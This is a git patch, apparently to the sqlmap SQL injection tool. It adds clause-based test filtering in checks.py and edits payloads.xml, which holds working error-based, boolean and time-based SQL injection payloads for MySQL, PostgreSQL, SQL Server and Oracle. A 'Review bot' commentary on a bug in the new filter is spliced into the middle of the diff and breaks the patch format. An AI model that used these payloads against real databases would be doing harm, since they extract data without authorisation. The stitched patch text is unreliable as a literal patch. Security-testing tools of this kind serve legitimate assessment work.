From 4dec049c22695bf4ff505a6d1f517df3a415381b Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Fri, 3 Dec 2010 12:00:03 +0000 Subject: [PATCH] Major bug fix for test on ORDER BY and GROUP BY clauses. Minor bug fix to skip following tests if they do not match any of the clause previously identified (injection.clause value). --- lib/controller/checks.py | 18 +++++++++ lib/core/datatype.py | 1 + xml/payloads.xml | 80 +++++++++++++++------------------------- 3 files changed, 49 insertions(+), 50 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 22a8589a7..462c16d78 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -94,6 +94,7 @@ def checkSqlInjection(place, parameter, value): for test in conf.tests: title = test.title stype = test.stype + clause = test.clause # Skip test if the risk is higher than the provided (or default) # value @@ -145,6 +146,22 @@ def checkSqlInjection(place, parameter, value): logger.debug(debugMsg) continue + # Skip test if it does not match the same SQL injection clause + # already identified by another test + # Parse test's + clauseMatch = False + + for clauseTest in clause: + if injection.clause is not None and clauseTest in injection.clause: + clauseMatch = True + break + + if clause != [ 0 ] and injection.clause and not clauseMatch: + debugMsg = "skipping test '%s' because the clause " % title + debugMsg += "differs from the clause already identified" + logger.debug(debugMsg) + continue + infoMsg = "testing '%s'" % title logger.info(infoMsg) @@ -340,6 +357,7 @@ def checkSqlInjection(place, parameter, value): injection.ptype = ptype injection.prefix = prefix injection.suffix = suffix + injection.clause = clause if "epayload" in test: epayload = "%s%s" % (test.epayload, comment) diff --git a/lib/core/datatype.py b/lib/core/datatype.py index 101b6315f..97b748b43 100644 --- a/lib/core/datatype.py +++ b/lib/core/datatype.py 
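Review bot: The new clause filter in the second checks.py hunk skips every clause-specific test once a clause-agnostic test has identified the injection: if the test that set `injection.clause` (third hunk) had `clause == [ 0 ]`, a later test with, say, `clause == [ 1 ]` finds no member of `[ 0 ]` in the loop and, because only the current test's `[ 0 ]` is exempted, reaches `continue`. If `0` denotes "any clause", as that exemption suggests, the stored value needs the same treatment: `if clause != [ 0 ] and injection.clause and injection.clause != [ 0 ] and not clauseMatch:`. The dangling `# Parse test's` comment is an unfinished fragment and should be completed or removed, and the `injection.clause is not None` test inside the `for clauseTest in clause:` loop is loop-invariant and reads better hoisted in front of the loop. checkSqlInjection's body starts and ends outside these hunks.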
@@ -70,6 +70,7 @@ def injectionDict(): injection.ptype = None injection.prefix = None injection.suffix = None + injection.clause = None # data is a dict with stype as key and a tuple as value with # title, where, comment and reqPayload diff --git a/xml/payloads.xml b/xml/payloads.xml index 749950b56..bb30133e9 100644 --- a/xml/payloads.xml +++ b/xml/payloads.xml @@ -393,16 +393,6 @@ Formats: - - - 2 - 2,3 - 1,2 - 1 - , - - - @@ -604,16 +594,6 @@ Formats: -- - - - 2 - 2,3 - 1,2 - 1 - , - - -- - @@ -662,10 +642,10 @@ Formats: 1 - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END)) + , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END)) - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END)) + , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))
MySQL @@ -682,10 +662,10 @@ Formats: 1 - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) + , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) + , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))
MySQL @@ -701,10 +681,10 @@ Formats: 1 - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) + , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) + , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))
Microsoft SQL Server @@ -720,10 +700,10 @@ Formats: 1 - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL) + , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL) - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL) + , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)
Oracle @@ -741,10 +721,10 @@ Formats: 1 - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END)) + , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END)) - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END)) + , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END)) @@ -1046,15 +1026,15 @@ Formats: - MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses + MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses (append) 2 3 0 2,3 1 - (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) + , (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) - (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) + , (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] @@ -1066,15 +1046,15 @@ Formats: - PostgreSQL error-based - GROUP BY and ORDER BY clauses + PostgreSQL error-based - GROUP BY and ORDER BY clauses (append) 2 3 0 2,3 1 - (CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC)) + , (CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC)) - (CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)) + , (CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] 
@@ -1085,15 +1065,15 @@ Formats: - Microsoft SQL Server/Sybase error-based - ORDER BY clause + Microsoft SQL Server/Sybase error-based - ORDER BY clause (append) 2 3 0 3 1 - (CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]'))) + , (CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]'))) - (CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))) + , (CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] @@ -1104,15 +1084,15 @@ Formats: - Oracle error-based - ORDER BY clause + Oracle error-based - ORDER BY clause (append) 2 3 0 3 1 - (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) + , (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) - (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) + , (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] @@ -1123,7 +1103,7 @@ Formats: - MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses + MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses (replace) 2 4 0 @@ -1143,7 +1123,7 @@ Formats: - PostgreSQL error-based - GROUP BY and ORDER BY clauses + PostgreSQL error-based - GROUP BY and ORDER BY clauses (replace) 2 4 0 @@ -1162,7 +1142,7 @@ Formats: - Microsoft SQL Server/Sybase error-based - ORDER BY clause + Microsoft SQL Server/Sybase error-based - ORDER BY clause (replace) 2 4 0 
@@ -1181,7 +1161,7 @@ Formats: - Oracle error-based - ORDER BY clause + Oracle error-based - ORDER BY clause (replace) 2 4 0 @@ -1437,7 +1417,7 @@ Formats: 5 1 1 - 1 + 1,2,3 1 AND IF((%s), [RANDNUM], SLEEP([SLEEPTIME])) @@ -1457,7 +1437,7 @@ Formats: 5 2 1 - 1 + 1,2,3 1 AND IF((%s), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]')) @@ -1525,7 +1505,7 @@ Formats: 5 2 3 - 1 + 1,2,3 1 OR IF((%s), [RANDNUM], SLEEP([SLEEPTIME])) @@ -1545,7 +1525,7 @@ Formats: 5 3 3 - 1 + 1,2,3 1 OR IF((%s), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]'))